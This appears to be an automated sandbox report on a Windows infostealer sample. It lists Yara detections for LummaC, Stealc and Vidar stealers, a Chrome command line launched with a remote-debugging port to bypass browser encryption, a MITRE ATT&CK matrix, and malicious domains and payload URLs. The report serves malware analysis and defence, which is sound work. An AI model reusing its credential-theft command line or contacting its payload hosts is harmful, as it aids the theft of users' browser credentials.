Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Directory queried: number of queries: 2526

Source: Yara match	File source: 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3040960830.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.3563789245.0000000001199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3128818775.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3122949469.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.3401961515.0000000001195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2961051279.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3125220663.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2924857239.0000000003498000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3106303828.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3120888829.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2957615256.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2961848227.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2980997521.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3055337116.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3102256253.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2943421605.0000000003498000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3112345519.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3110627341.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2890126732.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3133983224.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2988852728.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2979610284.0000000003499000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.3404778297.0000000001195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2926225223.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2959907784.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2912786822.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3127009361.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2988528325.000000000349B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3074568710.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.3562637684.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2980648761.0000000003499000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 7892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pisos23.exe PID: 8072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match	File source: 00000010.00000003.3077740668.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: da069a4b00.exe PID: 5844, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 7892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pisos23.exe PID: 8072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3540303643.0000000000B11000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2960979403.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3110291684.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.3420827049.00000000087E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3e169c0a7e.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 7fb3e2a1d2.exe PID: 2472, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	23 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	111 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	247 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	112 Process Injection	12 Software Packing	NTDS	11 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	881 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	111 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	381 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	381 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\chrome.dll	4%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	47%	ReversingLabs	Win32.Trojan.CredentialFlusher
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pisos23[1].exe	29%	ReversingLabs	Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	29%	ReversingLabs	Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	47%	ReversingLabs	Win32.Trojan.CredentialFlusher
C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	47%	ReversingLabs	Win32.Infostealer.Tinba

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
presticitpo.store	100%	URL Reputation	malware
necklacedmny.store	100%	URL Reputation	malware
fadehairucw.store	100%	URL Reputation	malware
thumbystriw.store	100%	URL Reputation	phishing
crisiwarny.store	100%	URL Reputation	malware

URLs

Source	Detection	Scanner	Label
unityshootsz.site	0%	Avira URL Cloud	safe
http://185.215.113.206/6Y	100%	Avira URL Cloud	malware
https://founpiuer.store/apih	100%	Avira URL Cloud	malware
http://detectportal.firefox.com/canonical.html.unified-extensions-context-menu-pin-to-toolbarACTIVIT	0%	Avira URL Cloud	safe
https://founpiuer.store/iV	100%	Avira URL Cloud	malware
https://addons.mozilla.orgupgradeTabsProgressListenertestPermissionFromPrincipalshowBadgeOnlyNotific	0%	Avira URL Cloud	safe
uppermixturyz.site	0%	Avira URL Cloud	safe
https://profiler.firefox.comException	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exe(gM	100%	Avira URL Cloud	phishing
http://185.215.113.206(	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeowFg	100%	Avira URL Cloud	phishing
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0	0%	Avira URL Cloud	safe
https://terracedjz.c	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/softokn3.dllEF	100%	Avira URL Cloud	malware
monopuncdz.site	0%	Avira URL Cloud	safe
https://firefox.settings.services.mozilla.com/v1It	0%	Avira URL Cloud	safe
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730737993153&w=0&anoncknm=app_anon&NoResponseBody=true	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/msvcp140.dll2F	100%	Avira URL Cloud	malware
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730737993150&w=0&anoncknm=app_anon&NoResponseBody=true	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
example.org	93.184.215.14	true	false		high
chrome.cloudflare-dns.com	162.159.61.3	true	false		high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false		high
services.addons.mozilla.org	151.101.129.91	true	false		high
contile.services.mozilla.com	34.117.188.166	true	false		high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false		high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false		high
ipv4only.arpa	192.0.0.170	true	false		high
terracedjz.cyou	188.114.97.3	true	true		unknown
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false		high
push.services.mozilla.com	34.107.243.93	true	false		high
www.google.com	142.250.186.132	true	false		high
normandy-cdn.services.mozilla.com	35.201.103.21	true	false		high
star-mini.c10r.facebook.com	157.240.253.35	true	false		high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false		high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false		high
twitter.com	104.244.42.65	true	false		high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false		unknown
dyna.wikimedia.org	185.15.59.224	true	false		high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false		high
youtube.com	142.250.185.78	true	false		high
youtube-ui.l.google.com	142.250.185.238	true	false		high
founpiuer.store	104.21.5.155	true	false		high
reddit.map.fastly.net	151.101.193.140	true	false		high
sb.scorecardresearch.com	18.245.60.72	true	false		high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false		high
www.reddit.com	unknown	unknown	false		high
spocs.getpocket.com	unknown	unknown	false		high
c.msn.com	unknown	unknown	false		unknown
ntp.msn.com	unknown	unknown	false		unknown
content-signature-2.cdn.mozilla.net	unknown	unknown	false		high
presticitpo.store	unknown	unknown	true	100%, URL Reputation	unknown
support.mozilla.org	unknown	unknown	false		high
firefox.settings.services.mozilla.com	unknown	unknown	false		high
necklacedmny.store	unknown	unknown	true	100%, URL Reputation	unknown
www.youtube.com	unknown	unknown	false		high
fadehairucw.store	unknown	unknown	true	100%, URL Reputation	unknown
assets.msn.com	unknown	unknown	false		unknown
www.facebook.com	unknown	unknown	false		high
detectportal.firefox.com	unknown	unknown	false		high
normandy.cdn.mozilla.net	unknown	unknown	false		unknown
